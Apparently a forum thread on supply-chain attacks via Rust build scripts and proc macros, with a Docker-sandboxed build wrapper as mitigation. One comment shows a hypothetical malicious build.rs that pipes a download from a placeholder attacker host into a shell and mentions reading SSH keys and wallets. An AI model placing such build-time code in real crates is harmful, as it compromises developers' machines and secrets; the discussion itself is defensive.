Proc macros and build scripts download and execute code at compile time. If a dependency of a dependency of a dependency gets hacked and inserts bad code into its crate, developers around the world will get infected. It’s like curl2bash from a bunch of random sources every time you hit compile.
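To make that concrete, here is a hypothetical sketch of what a compromised transitive dependency could ship as its build.rs. Cargo compiles and runs this on the developer’s machine during every build, with the developer’s privileges; the URL below is a made-up placeholder, not a real payload.

```rust
// build.rs of a hypothetical compromised dependency.
// Cargo compiles and runs this on the host during `cargo build`,
// before any of the downstream project's own code is even built.
use std::process::Command;

fn main() {
    // Anything can go here: read ~/.ssh, look for wallet files, phone home.
    // The URL is a placeholder for illustration only.
    let _ = Command::new("sh")
        .arg("-c")
        .arg("curl -s https://attacker.example/payload.sh | sh")
        .status();

    // Then do something legitimate-looking so nothing seems off.
    println!("cargo:rerun-if-changed=build.rs");
}
```

A proc macro is the same story, except the attacker’s code runs inside the rustc process itself rather than as a separate build script.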
Infections have already happened a few times in the NodeJS world, and the general consensus was “this wasn’t as bad as it could’ve been” and “we should probably add 2FA to publishing accounts”. There are a few niche NodeJS alternatives that sandbox the npm install process, but they’re far from mainstream.
With Rust dependency trees looking more and more like JavaScript’s, I think it’s only a matter of time before a big crate like serde or reqwest gets infected by a supply chain attack and tens of millions of dollars’ worth of bitcoin gets stolen from developers’ machines.
It would be so easy for a desperate dev with a gambling debt and a small side project that major companies lean on to fall victim to extortion, and this risk is embedded in almost every programming language. It’s not just a Rust problem, and very few people are working on a solution right now (luckily, the Rust devs are among them!)
I don’t think this is a problem with proc macros or package managers. This is just a regular supply chain attack, no?
The way I understand it, sandboxing would be detrimental to code performance. Imagine coding a messaging system with a serde struct, only for the serde code to be much slower due to sandboxing. For release builds it could be suggested to disable sandboxing, but then we would have gained practically nothing.
In security terms, being prepared for incidents is most often better than trying to prevent them. I think this applies here too, and cargo helps: it can update your packages with a single cargo update, which can be used to patch attacks like this out quickly.
If you think I’m wrong, please don’t hesitate to tell me!
“Normal” supply chain attacks would infect the executable being built, targeting your customers, while this one attacks the local dev machine. For example, the malware that got inserted into a pirated copy of Xcode infected tons of Chinese iPhone apps, but didn’t do much on the devs’ machines.
Sandboxing wouldn’t necessarily lead to detrimental performance. It should be quite feasible to use sandboxing APIs (like the ones Docker uses) to restrict the compiler while proc macros are being processed. On operating systems where tight sandboxing APIs aren’t available this is a bigger challenge, but steps definitely can be taken to mitigate the problem in some scenarios.
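To illustrate the kind of mitigation being described here (not an existing cargo feature, just a sketch of what can be approximated today with Docker): run the whole build inside a container with no network access and a read-only mount of the source tree. The project path, image tag and volume name below are assumptions, and it presumes dependencies were vendored ahead of time (e.g. with cargo vendor) so the offline build can resolve them.

```rust
// Hypothetical wrapper: run `cargo build` inside a Docker container so that
// build scripts and proc macros see no network and only a read-only copy of
// the source tree. Paths, the image tag and the volume name are placeholders.
use std::process::Command;

fn main() {
    let status = Command::new("docker")
        .args([
            "run", "--rm",
            "--network", "none",               // no outbound connections for build-time code
            "-v", "/home/dev/project:/src:ro", // source tree mounted read-only (assumed path)
            "-v", "cargo-target:/target",      // named volume for build artifacts
            "-w", "/src",
            "rust:1.75",                       // assumed toolchain image
            "cargo", "build", "--offline", "--locked", "--target-dir", "/target",
        ])
        .status()
        .expect("failed to launch docker");

    std::process::exit(status.code().unwrap_or(1));
}
```

A hostile build.rs can still burn CPU inside the container, but it can’t reach the developer’s SSH keys, browser profiles or the network. The compiled artifacts are of course still untrusted; this only protects the machine doing the compiling.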
In terms of security you should of course assume that you’ve been hacked (or that you will be hacked), but that doesn’t mean you should make it easier. You don’t disable your antivirus because hackers are inevitable and you don’t run your entire OS in ring 0 because kernel exploits will always be found anyway; there are ways to slow hackers down, and we should use them whenever possible. Sandboxing risky compiler operations is just one link in a long chain of security measures.